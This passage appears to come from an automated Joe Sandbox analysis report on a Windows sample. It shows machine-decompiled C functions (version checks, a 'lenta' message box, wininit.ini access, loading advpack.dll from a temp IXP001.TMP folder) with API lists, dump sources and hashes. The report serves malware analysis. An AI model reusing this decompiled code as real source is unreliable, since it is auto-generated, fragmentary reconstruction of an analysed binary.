					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00026CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                                0x000224e0
                                                                                                                                                                                                                                                0x000224eb
                                                                                                                                                                                                                                                0x000224f2
                                                                                                                                                                                                                                                0x000224f7
                                                                                                                                                                                                                                                0x00022504
                                                                                                                                                                                                                                                0x0002250e
                                                                                                                                                                                                                                                0x0002251d
                                                                                                                                                                                                                                                0x0002252c
                                                                                                                                                                                                                                                0x00022541
                                                                                                                                                                                                                                                0x00022546
                                                                                                                                                                                                                                                0x00022553
                                                                                                                                                                                                                                                0x00022555
                                                                                                                                                                                                                                                0x00022555
                                                                                                                                                                                                                                                0x00022546
                                                                                                                                                                                                                                                0x0002256c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00022506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0002252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32 ref: 0002253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0002254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 00022555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 142773cf7a090a1827aaf5f9b7c3dddc8b0700906d40680d18883f0554e9b4ff
                                                                                                                                                                                                                                                • Instruction ID: 243bbf3f270a29c50bce97c94769d53d3a9bfa2df41a62990c48275fdb1e32ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 142773cf7a090a1827aaf5f9b7c3dddc8b0700906d40680d18883f0554e9b4ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD01B5327011286BD7309B65AC4CEDF7BBCEB46760F100155FA49D3190DE788E56CAA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000236EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E000236EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x28004; // 0xf4950d3e
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x28184 = 1;
						 *0x28180 = 1;
						L13:
						 *0x29a40 = _t119;
						L14:
						__eflags =  *0x28a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00022A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00022A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x28a38 & 0x00000001;
											if(( *0x28a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0002681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E000267C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E000228E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x29a40 = _t119;
						 *0x28184 = 1;
						 *0x28180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x29a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x28184 = _t135;
							 *0x28180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E000244B9(0, _t138);
					L66:
					return E00026CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                                0x000236f9
                                                                                                                                                                                                                                                0x00023700
                                                                                                                                                                                                                                                0x0002370c
                                                                                                                                                                                                                                                0x00023716
                                                                                                                                                                                                                                                0x00023718
                                                                                                                                                                                                                                                0x0002371b
                                                                                                                                                                                                                                                0x00023721
                                                                                                                                                                                                                                                0x0002372b
                                                                                                                                                                                                                                                0x0002373d
                                                                                                                                                                                                                                                0x00023745
                                                                                                                                                                                                                                                0x00023746
                                                                                                                                                                                                                                                0x00023746
                                                                                                                                                                                                                                                0x00023749
                                                                                                                                                                                                                                                0x000237ab
                                                                                                                                                                                                                                                0x000237ad
                                                                                                                                                                                                                                                0x000237ae
                                                                                                                                                                                                                                                0x000237b3
                                                                                                                                                                                                                                                0x000237b8
                                                                                                                                                                                                                                                0x000237b8
                                                                                                                                                                                                                                                0x000237bf
                                                                                                                                                                                                                                                0x000237bf
                                                                                                                                                                                                                                                0x000237c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000237cb
                                                                                                                                                                                                                                                0x000237cd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000237d5
                                                                                                                                                                                                                                                0x000237db
                                                                                                                                                                                                                                                0x000237e8
                                                                                                                                                                                                                                                0x000237ea
                                                                                                                                                                                                                                                0x000237ea
                                                                                                                                                                                                                                                0x000237ea
                                                                                                                                                                                                                                                0x000237f0
                                                                                                                                                                                                                                                0x000237f6
                                                                                                                                                                                                                                                0x00023805
                                                                                                                                                                                                                                                0x00023817
                                                                                                                                                                                                                                                0x0002382b
                                                                                                                                                                                                                                                0x00023830
                                                                                                                                                                                                                                                0x00023836
                                                                                                                                                                                                                                                0x0002383b
                                                                                                                                                                                                                                                0x0002383d
                                                                                                                                                                                                                                                0x000238eb
                                                                                                                                                                                                                                                0x000238eb
                                                                                                                                                                                                                                                0x000238f2
                                                                                                                                                                                                                                                0x0002390c
                                                                                                                                                                                                                                                0x00023911
                                                                                                                                                                                                                                                0x00023911
                                                                                                                                                                                                                                                0x00023913
                                                                                                                                                                                                                                                0x0002394d
                                                                                                                                                                                                                                                0x0002394d
                                                                                                                                                                                                                                                0x0002394f
                                                                                                                                                                                                                                                0x000238a9
                                                                                                                                                                                                                                                0x000238a9
                                                                                                                                                                                                                                                0x000238b0
                                                                                                                                                                                                                                                0x000238b2
                                                                                                                                                                                                                                                0x000238b9
                                                                                                                                                                                                                                                0x000238bb
                                                                                                                                                                                                                                                0x000238c1
                                                                                                                                                                                                                                                0x00023975
                                                                                                                                                                                                                                                0x000238c7
                                                                                                                                                                                                                                                0x000238de
                                                                                                                                                                                                                                                0x000238e0
                                                                                                                                                                                                                                                0x000238e0
                                                                                                                                                                                                                                                0x0002397b
                                                                                                                                                                                                                                                0x0002397d
                                                                                                                                                                                                                                                0x000239a9
                                                                                                                                                                                                                                                0x0002397f
                                                                                                                                                                                                                                                0x00023982
                                                                                                                                                                                                                                                0x0002398b
                                                                                                                                                                                                                                                0x0002398d
                                                                                                                                                                                                                                                0x0002398f
                                                                                                                                                                                                                                                0x0002399f
                                                                                                                                                                                                                                                0x000239a1
                                                                                                                                                                                                                                                0x00023991
                                                                                                                                                                                                                                                0x00023991
                                                                                                                                                                                                                                                0x00023991
                                                                                                                                                                                                                                                0x0002398f
                                                                                                                                                                                                                                                0x000239af
                                                                                                                                                                                                                                                0x000239b6
                                                                                                                                                                                                                                                0x00023a0f
                                                                                                                                                                                                                                                0x00023a0f
                                                                                                                                                                                                                                                0x00023a11
                                                                                                                                                                                                                                                0x00023a13
                                                                                                                                                                                                                                                0x00023a19
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239b8
                                                                                                                                                                                                                                                0x000239b8
                                                                                                                                                                                                                                                0x000239ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239bc
                                                                                                                                                                                                                                                0x000239bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239c3
                                                                                                                                                                                                                                                0x000239c9
                                                                                                                                                                                                                                                0x000239ce
                                                                                                                                                                                                                                                0x000239d0
                                                                                                                                                                                                                                                0x000239e3
                                                                                                                                                                                                                                                0x000239e5
                                                                                                                                                                                                                                                0x000239e6
                                                                                                                                                                                                                                                0x000239f1
                                                                                                                                                                                                                                                0x000239f7
                                                                                                                                                                                                                                                0x000239fa
                                                                                                                                                                                                                                                0x00023a01
                                                                                                                                                                                                                                                0x00023a04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023a06
                                                                                                                                                                                                                                                0x00023a09
                                                                                                                                                                                                                                                0x00023a09
                                                                                                                                                                                                                                                0x00023a0b
                                                                                                                                                                                                                                                0x00023a0b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023a09
                                                                                                                                                                                                                                                0x000239fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239fc
                                                                                                                                                                                                                                                0x000239d3
                                                                                                                                                                                                                                                0x000239d8
                                                                                                                                                                                                                                                0x000239da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239dc
                                                                                                                                                                                                                                                0x000239b6
                                                                                                                                                                                                                                                0x00023955
                                                                                                                                                                                                                                                0x0002395b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023961
                                                                                                                                                                                                                                                0x00023963
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023969
                                                                                                                                                                                                                                                0x00023969
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023969
                                                                                                                                                                                                                                                0x00023915
                                                                                                                                                                                                                                                0x00023915
                                                                                                                                                                                                                                                0x0002391b
                                                                                                                                                                                                                                                0x0002391f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002392d
                                                                                                                                                                                                                                                0x00023933
                                                                                                                                                                                                                                                0x00023938
                                                                                                                                                                                                                                                0x0002393a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023940
                                                                                                                                                                                                                                                0x00023946
                                                                                                                                                                                                                                                0x0002394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238f2
                                                                                                                                                                                                                                                0x00023843
                                                                                                                                                                                                                                                0x00023845
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002384b
                                                                                                                                                                                                                                                0x0002384d
                                                                                                                                                                                                                                                0x00023883
                                                                                                                                                                                                                                                0x00023885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002389a
                                                                                                                                                                                                                                                0x0002389e
                                                                                                                                                                                                                                                0x0002389e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238a0
                                                                                                                                                                                                                                                0x000238a0
                                                                                                                                                                                                                                                0x000238a2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238a4
                                                                                                                                                                                                                                                0x0002384f
                                                                                                                                                                                                                                                0x00023851
                                                                                                                                                                                                                                                0x00023857
                                                                                                                                                                                                                                                0x0002386e
                                                                                                                                                                                                                                                0x00023877
                                                                                                                                                                                                                                                0x0002387b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023881
                                                                                                                                                                                                                                                0x00023859
                                                                                                                                                                                                                                                0x0002385c
                                                                                                                                                                                                                                                0x00023862
                                                                                                                                                                                                                                                0x00023866
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023868
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000238f4
                                                                                                                                                                                                                                                0x000238f4
                                                                                                                                                                                                                                                0x000238f5
                                                                                                                                                                                                                                                0x000238fb
                                                                                                                                                                                                                                                0x00023901
                                                                                                                                                                                                                                                0x00023901
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002390a
                                                                                                                                                                                                                                                0x0002374b
                                                                                                                                                                                                                                                0x0002374e
                                                                                                                                                                                                                                                0x0002375c
                                                                                                                                                                                                                                                0x00023764
                                                                                                                                                                                                                                                0x00023769
                                                                                                                                                                                                                                                0x0002376e
                                                                                                                                                                                                                                                0x00023771
                                                                                                                                                                                                                                                0x0002379c
                                                                                                                                                                                                                                                0x0002379f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000237a3
                                                                                                                                                                                                                                                0x000237a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000237a4
                                                                                                                                                                                                                                                0x00023773
                                                                                                                                                                                                                                                0x00023777
                                                                                                                                                                                                                                                0x00023778
                                                                                                                                                                                                                                                0x0002377f
                                                                                                                                                                                                                                                0x00023781
                                                                                                                                                                                                                                                0x0002378e
                                                                                                                                                                                                                                                0x0002378e
                                                                                                                                                                                                                                                0x00023794
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023794
                                                                                                                                                                                                                                                0x00023783
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023785
                                                                                                                                                                                                                                                0x0002378c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002378c
                                                                                                                                                                                                                                                0x00023750
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002372d
                                                                                                                                                                                                                                                0x0002372d
                                                                                                                                                                                                                                                0x0002396b
                                                                                                                                                                                                                                                0x0002396b
                                                                                                                                                                                                                                                0x0002396c
                                                                                                                                                                                                                                                0x0002396e
                                                                                                                                                                                                                                                0x0002396f
                                                                                                                                                                                                                                                0x00023a1e
                                                                                                                                                                                                                                                0x00023a1e
                                                                                                                                                                                                                                                0x00023a22
                                                                                                                                                                                                                                                0x00023a27
                                                                                                                                                                                                                                                0x00023a3e
                                                                                                                                                                                                                                                0x00023a3e

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00023723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 000239C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 000239F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: 239837d1c14ed7dbfbbd046da2983fe2cef5989786438febbfb8fda600c0f676
                                                                                                                                                                                                                                                • Instruction ID: ddfaa17dee176cb719cc8917aedcf3ec7604dffae7b666d51912e94547743dd9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 239837d1c14ed7dbfbbd046da2983fe2cef5989786438febbfb8fda600c0f676
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1691E371A012349BEBB48B14EC817EAB7F5AB46304F1541A9D8899B291DB788F81CF42
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00026495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E00026495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x28004; // 0xf4950d3e
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00021781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E0002658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00026CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                                0x00026495
                                                                                                                                                                                                                                                0x00026495
                                                                                                                                                                                                                                                0x000264a0
                                                                                                                                                                                                                                                0x000264a7
                                                                                                                                                                                                                                                0x000264ab
                                                                                                                                                                                                                                                0x000264bd
                                                                                                                                                                                                                                                0x000264c2
                                                                                                                                                                                                                                                0x000264d3
                                                                                                                                                                                                                                                0x000264df
                                                                                                                                                                                                                                                0x000264e8
                                                                                                                                                                                                                                                0x00026502
                                                                                                                                                                                                                                                0x000264ee
                                                                                                                                                                                                                                                0x000264f9
                                                                                                                                                                                                                                                0x000264f9
                                                                                                                                                                                                                                                0x00026516

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000264DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000264F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00026502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-3761280616
                                                                                                                                                                                                                                                • Opcode ID: 0491dbdd95ecb1c1297a948e8c29a5d52adb8f3a9a0d5c64480595e054fddb22
                                                                                                                                                                                                                                                • Instruction ID: 509b481d00494f70cbc66c1b513da5124a1880addb5ea8e90810f506f8bace40
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0491dbdd95ecb1c1297a948e8c29a5d52adb8f3a9a0d5c64480595e054fddb22
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB01D6306041289BE760DB64EC89FEE7378DB65310F600195F585921C0DF75AE86CA51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000228E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000228E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00022773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
